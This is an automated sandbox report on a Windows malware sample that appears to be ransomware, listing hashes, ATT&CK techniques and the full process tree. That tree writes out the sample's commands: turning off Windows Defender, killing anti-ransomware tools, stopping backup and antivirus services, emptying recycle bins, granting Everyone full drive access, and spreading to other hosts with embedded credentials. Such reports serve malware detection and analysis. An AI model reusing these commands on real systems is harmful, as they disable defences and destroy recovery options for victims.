1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
8s
max time network
152s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Size

370KB
MD5

b8421f1d4bd96ca5b1e9a6e919e6a167
SHA1

e1040ad363c3a5bb7587faebaab0aecdc70a21df
SHA256

0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f
SHA512

e2ee73d80631d51d4d5267f34e6c7873c79fe1968d73daea141d782fc693fb6f436be18c9a3756fca3e68a44e2e75c9376e194f3ab11f95942e93b3a28117b63

Score

10^/10

discovery evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
10572	Process not Found
15408	Process not Found
12952	Process not Found
16320	Process not Found
16764	Process not Found
16580	Process not Found
8244	Process not Found
16948	Process not Found
14496	Process not Found
18368	Process not Found
12732	Process not Found
12324	Process not Found
6020	Process not Found
5948	Process not Found
17068	Process not Found
7272	Process not Found
8780	Process not Found
13088	Process not Found
10364	Process not Found
17932	Process not Found
12844	Process not Found
8268	Process not Found
11880	icacls.exe
15544	Process not Found
15536	Process not Found
4356	Process not Found
14220	Process not Found
16440	Process not Found
14748	Process not Found
13928	Process not Found
10608	Process not Found
14412	Process not Found
11892	icacls.exe
18380	Process not Found
5688	Process not Found
17980	Process not Found
8012	Process not Found
8428	Process not Found
18212	Process not Found
5596	Process not Found
5884	Process not Found
4940	Process not Found
11476	Process not Found
8576	Process not Found
13796	Process not Found
18364	Process not Found
1496	Process not Found
12700	Process not Found
12468	Process not Found
11864	icacls.exe
17776	Process not Found
12388	Process not Found
15404	Process not Found
4828	Process not Found
6996	Process not Found
12212	Process not Found
11608	Process not Found
12956	Process not Found
5932	Process not Found
14620	Process not Found
4876	Process not Found
12172	Process not Found
12376	Process not Found
7828	Process not Found

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
6240	net.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
8896	Process not Found
18256	Process not Found
13904	Process not Found
10920	taskkill.exe
10604	taskkill.exe
11948	Process not Found
1804	Process not Found
17260	Process not Found
14492	Process not Found
12764	Process not Found
11428	taskkill.exe
13720	Process not Found
10660	taskkill.exe
14724	Process not Found
4928	Process not Found
11648	taskkill.exe
11096	taskkill.exe
5172	Process not Found
11676	taskkill.exe
10700	taskkill.exe
17152	taskkill.exe
13680	Process not Found
15776	Process not Found
8408	Process not Found
16568	Process not Found
11796	taskkill.exe
11760	taskkill.exe
11496	taskkill.exe
11420	taskkill.exe
10028	Process not Found
10748	taskkill.exe
6632	Process not Found
7712	Process not Found
8300	Process not Found
16668	Process not Found
17804	Process not Found
12260	Process not Found
13224	Process not Found
15896	Process not Found
11748	taskkill.exe
11604	taskkill.exe
6388	Process not Found
6348	Process not Found
5432	Process not Found
11592	taskkill.exe
17228	Process not Found
10576	taskkill.exe
10568	taskkill.exe
9880	Process not Found
11820	taskkill.exe
11516	taskkill.exe
14980	Process not Found
11552	taskkill.exe
13232	Process not Found
16072	Process not Found
11660	taskkill.exe
8212	Process not Found
10676	taskkill.exe
9428	Process not Found
10732	taskkill.exe
10668	taskkill.exe
17892	Process not Found
17488	Process not Found
11836	Process not Found

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

T1112

pid	Process
14184	Process not Found
4936	reg.exe
17208	reg.exe
6372	Process not Found

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

description	pid	Process
Token: SeDebugPrivilege	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeIncreaseQuotaPrivilege	3064	powershell.exe
Token: SeSecurityPrivilege	3064	powershell.exe
Token: SeTakeOwnershipPrivilege	3064	powershell.exe
Token: SeLoadDriverPrivilege	3064	powershell.exe
Token: SeSystemProfilePrivilege	3064	powershell.exe
Token: SeSystemtimePrivilege	3064	powershell.exe
Token: SeProfSingleProcessPrivilege	3064	powershell.exe
Token: SeIncBasePriorityPrivilege	3064	powershell.exe
Token: SeCreatePagefilePrivilege	3064	powershell.exe
Token: SeBackupPrivilege	3064	powershell.exe
Token: SeRestorePrivilege	3064	powershell.exe
Token: SeShutdownPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeSystemEnvironmentPrivilege	3064	powershell.exe
Token: SeRemoteShutdownPrivilege	3064	powershell.exe
Token: SeUndockPrivilege	3064	powershell.exe
Token: SeManageVolumePrivilege	3064	powershell.exe
Token: 33	3064	powershell.exe
Token: 34	3064	powershell.exe
Token: 35	3064	powershell.exe
Token: 36	3064	powershell.exe
Token: SeDebugPrivilege	2072	net.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	3528	powershell.exe
Token: SeDebugPrivilege	2940	powershell.exe
Token: SeDebugPrivilege	188	powershell.exe
Token: SeDebugPrivilege	3348	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 3176 wrote to memory of 3064	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	76
PID 3176 wrote to memory of 3064	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	76
PID 3176 wrote to memory of 2072	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	1670
PID 3176 wrote to memory of 2072	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	1670
PID 3176 wrote to memory of 3980	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	81
PID 3176 wrote to memory of 3980	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	81
PID 3176 wrote to memory of 3528	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	83
PID 3176 wrote to memory of 3528	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	83
PID 3176 wrote to memory of 2940	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	85
PID 3176 wrote to memory of 2940	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	85
PID 3176 wrote to memory of 3348	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	87
PID 3176 wrote to memory of 3348	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	87
PID 3176 wrote to memory of 188	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	89
PID 3176 wrote to memory of 188	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	89
PID 3176 wrote to memory of 3188	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	91
PID 3176 wrote to memory of 3188	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	91
PID 3176 wrote to memory of 4176	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	93
PID 3176 wrote to memory of 4176	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	93
PID 3176 wrote to memory of 4308	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	1636
PID 3176 wrote to memory of 4308	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	1636
PID 3176 wrote to memory of 4464	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	97
PID 3176 wrote to memory of 4464	3176	0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe	97

C:\Users\Admin\AppData\Local\Temp\0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  PID:2072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:188
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  PID:3188
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  PID:4176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  PID:4308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  PID:4464
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:4616
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  PID:4752
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  PID:4868
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:4892
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:4936
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:4984
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:5092
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:4140
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:3912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:16012
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:4368
- C:\Windows\SYSTEM32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:4436
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:4256
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:4760
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:2684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “SQL Backups /y
    3⤵
    PID:16068
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:5136
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:5200
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:4652
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:5252
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:5312
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start Dnscache /y
  2⤵
  PID:5372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start Dnscache /y
    3⤵
    PID:5808
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start SSDPSRV /y
  2⤵
  PID:5412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start SSDPSRV /y
    3⤵
    PID:5852
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:5512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:5992
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:5696
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop bedbg /y
    3⤵
    PID:6108
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c net view
  2⤵
  PID:5648
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:6240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  2⤵
  PID:5608
- - C:\Users\Admin\AppData\Local\Temp\CC311802-D763-41F1-8551-E0F53DC4421C\dismhost.exe
    C:\Users\Admin\AppData\Local\Temp\CC311802-D763-41F1-8551-E0F53DC4421C\dismhost.exe {C15CF755-F9B8-49DB-AEFC-EDA0A381D93C}
    3⤵
    PID:5544
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:5552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:5980
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start upnphost /y
  2⤵
  PID:5472
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start upnphost /y
    3⤵
    PID:5932
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start FDResPub /y
  2⤵
  PID:5724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start FDResPub /y
    3⤵
    PID:4276
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:5920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5420
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:6024
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:4760
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:6140
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:4972
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:4940
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:4140
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:5232
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:7828
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:5484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MMS /y
    3⤵
    PID:10528
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:5248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:12064
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:5540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EhttpSrv /y
    3⤵
    PID:8300
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:5616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mozyprobackup /y
    3⤵
    PID:6120
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:4932
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:9812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:5880
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:5400
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:12928
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
  PID:4984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EraserSvc11710 /y
    3⤵
    PID:14900
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop “Sophos Agent” /y
  2⤵
  PID:5228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Agent” /y
    3⤵
    PID:11172
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:5256
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeES /y
    3⤵
    PID:16028
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:5268
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop IISAdmin /y
    3⤵
    PID:15708
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:7592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3⤵
    PID:15988
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:9592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPSecurityService /y
    3⤵
    PID:15308
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM Ntrtscan.exe /F
  2⤵
  PID:11292
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.30 /USER:ragulin Steel_Rat_2020
  2⤵
  PID:14452
- C:\Users\Admin\AppData\Local\Temp\0fers41y.exe
  "C:\Users\Admin\AppData\Local\Temp\0fers41y.exe" \\10.10.0.30 -u "" -p "" -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe"
  2⤵
  PID:18008
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.36 /USER:ragulin Steel_Rat_2020
  2⤵
  PID:18360
- C:\Users\Admin\AppData\Local\Temp\0fers41y.exe
  "C:\Users\Admin\AppData\Local\Temp\0fers41y.exe" \\10.10.0.36 -u "" -p "" -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe"
  2⤵
  PID:14564
- C:\Users\Admin\AppData\Local\Temp\0fers41y.exe
  "C:\Users\Admin\AppData\Local\Temp\0fers41y.exe" \\10.10.0.36 -u "ragulin" -p "Steel_Rat_2020" -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe"
  2⤵
  PID:15480
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.36 /USER:
  2⤵
  PID:5008
- C:\Users\Admin\AppData\Local\Temp\0fers41y.exe
  "C:\Users\Admin\AppData\Local\Temp\0fers41y.exe" \\10.10.0.30 -u "ragulin" -p "Steel_Rat_2020" -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe"
  2⤵
  PID:17776
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.10.0.30 /USER:
  2⤵
  PID:16380
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "Z:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:11892
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "D:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:11880
- C:\Windows\SYSTEM32\icacls.exe
  "icacls" "C:*" /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:11864
